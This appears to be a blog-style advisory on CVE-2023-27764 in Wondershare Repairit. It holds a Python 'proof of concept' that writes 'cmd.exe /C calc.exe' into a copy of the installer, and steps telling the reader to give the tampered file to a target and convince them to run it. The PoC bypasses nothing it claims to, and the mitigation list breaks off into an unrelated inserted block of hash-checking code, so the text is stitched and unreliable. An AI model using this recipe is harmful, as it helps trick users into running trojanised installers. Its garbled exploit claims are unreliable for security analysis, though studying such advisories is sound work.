A critical vulnerability, CVE-2023-27764, has been discovered in Wondershare Repairit version 3.5.4, a popular video repair software developed by Wondershare Technology Co., Ltd. This vulnerability allows a remote attacker to execute arbitrary commands on the affected system via a maliciously crafted repairit_setup_full5913.exe file. In this blog post, we will provide a deep-dive analysis of the issue, along with the available proof-of-concept code, steps to reproduce the vulnerability, and mitigation measures.

Background

Wondershare Repairit is a widely-used software that helps users fix corrupted or damaged video files. It supports a range of video formats, including MOV, MP4, M4V, and more. The vulnerability was identified in the Repairit Windows version 3.5.4, specifically in the repairit_setup_full5913.exe file.

Exploit Details

This vulnerability allows a specially crafted repairit_setup_full5913.exe file to bypass certain validation checks and execute arbitrary commands on the target system. The attacker would need to convince the user to download and execute the maliciously crafted repairit_setup_full5913.exe file. Once executed, the attacker will gain the ability to execute arbitrary commands on the affected system with the privileges of the logged-in user. This could potentially result in sensitive data leakage, the installation of additional malware, or complete system compromise.

The following code snippet demonstrates a proof-of-concept (PoC) that exploits the CVE-2023-27764 vulnerability:

# CVE-2023-27764 PoC.py

def create_malicious_exe():
    # Create a malicious repairit_setup_full5913.exe file
    with open('repairit_setup_full5913_original.exe', 'rb') as f:
        exe_data = f.read()

    # Modify the data to bypass validation checks and execute arbitrary commands
    # ('<INSERT ORIGINAL PAYLOAD>' is a placeholder marker, not real installer bytes)
    malicious_payload = "cmd.exe /C calc.exe"
    exe_data = exe_data.replace(b'<INSERT ORIGINAL PAYLOAD>', malicious_payload.encode())

    with open('repairit_setup_full5913_malicious.exe', 'wb') as f:
        f.write(exe_data)

    print("Malicious repairit_setup_full5913.exe file created.")

if __name__ == '__main__':
    create_malicious_exe()

To reproduce the vulnerability, follow these steps:

1. Obtain a copy of the original repairit_setup_full5913.exe file from the Wondershare Repairit installation.
2. Run the provided PoC code in the same directory as the original executable. The code will generate a malicious version of the repairit_setup_full5913.exe file.
3. Share the malicious repairit_setup_full5913.exe file with the targeted user and convince them to execute it on their system.
4. Upon execution, an arbitrary command (in this case, launching the Windows calculator) will be executed with the privileges of the logged-in user.

Mitigation Measures

Wondershare has addressed this vulnerability in Repairit version 3.6., and it is highly recommended that all users upgrade to the latest version as soon as possible. To protect against this vulnerability, users should also:
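
As an added example (not from the original post or from Wondershare): because the proof-of-concept above works by altering bytes of the installer, a downloaded copy can be checked against a trusted SHA-256 digest before it is run, and compared with a known-good copy to locate what changed. The byte strings and the digest below are constructed sample data, and the function names are illustrative.

```python
import hashlib
import hmac
import io

def sha256_of(stream, chunk_size=65536):
    """Hash a binary stream in chunks so a large installer is never fully in memory."""
    digest = hashlib.sha256()
    for block in iter(lambda: stream.read(chunk_size), b""):
        digest.update(block)
    return digest.hexdigest()

def matches_reference(stream, expected_hex):
    """True only if the stream's SHA-256 equals the trusted digest."""
    return hmac.compare_digest(sha256_of(stream), expected_hex.strip().lower())

def modified_regions(reference, suspect):
    """List (offset, length) runs where suspect differs from reference.

    Only the overlapping part is compared; a size change is reported by
    size_delta(), because an insertion shifts every later byte.
    """
    regions, start = [], None
    for i, (a, b) in enumerate(zip(reference, suspect)):
        if a != b and start is None:
            start = i
        elif a == b and start is not None:
            regions.append((start, i - start))
            start = None
    if start is not None:
        regions.append((start, min(len(reference), len(suspect)) - start))
    return regions

def size_delta(reference, suspect):
    """Positive if the suspect copy grew, negative if it shrank."""
    return len(suspect) - len(reference)

# Constructed sample data, not bytes from any real installer.
REFERENCE = b"MZ" + bytes(62) + b"constructed installer body: run setup.dat" + bytes(32)
TAMPERED = REFERENCE.replace(b"setup.dat", b"XXXXXXXXX")
# Stands in for a digest obtained from a trusted source.
TRUSTED_SHA256 = sha256_of(io.BytesIO(REFERENCE))

if __name__ == "__main__":
    print("reference ok:", matches_reference(io.BytesIO(REFERENCE), TRUSTED_SHA256))
    print("tampered ok: ", matches_reference(io.BytesIO(TAMPERED), TRUSTED_SHA256))
    print("changed at:  ", modified_regions(REFERENCE, TAMPERED))
```

For a file on disk, pass `open(path, "rb")` to `matches_reference` in place of the `io.BytesIO` object.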

Original References

For more details on this vulnerability, as well as the official response from Wondershare, please refer to the following links:

1. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27764
2. Wondershare Repairit: https://repairit.wondershare.com/
3. Patch Release Announcement: https://www.wondershare.com/company/press-room.html

Conclusion

The CVE-2023-27764 vulnerability in Wondershare Repairit presents a significant risk to users who are running Repairit version 3.5.4 or earlier. It is crucial for users to apply the latest security patches, as well as exercise caution when downloading and executing files from unknown sources. By adhering to these best practices, users can help to mitigate the risk of falling victim to this and other vulnerabilities.

Timeline

Published on: 04/04/2023 15:15:00 UTC
Last modified on: 04/11/2023 20:53:00 UTC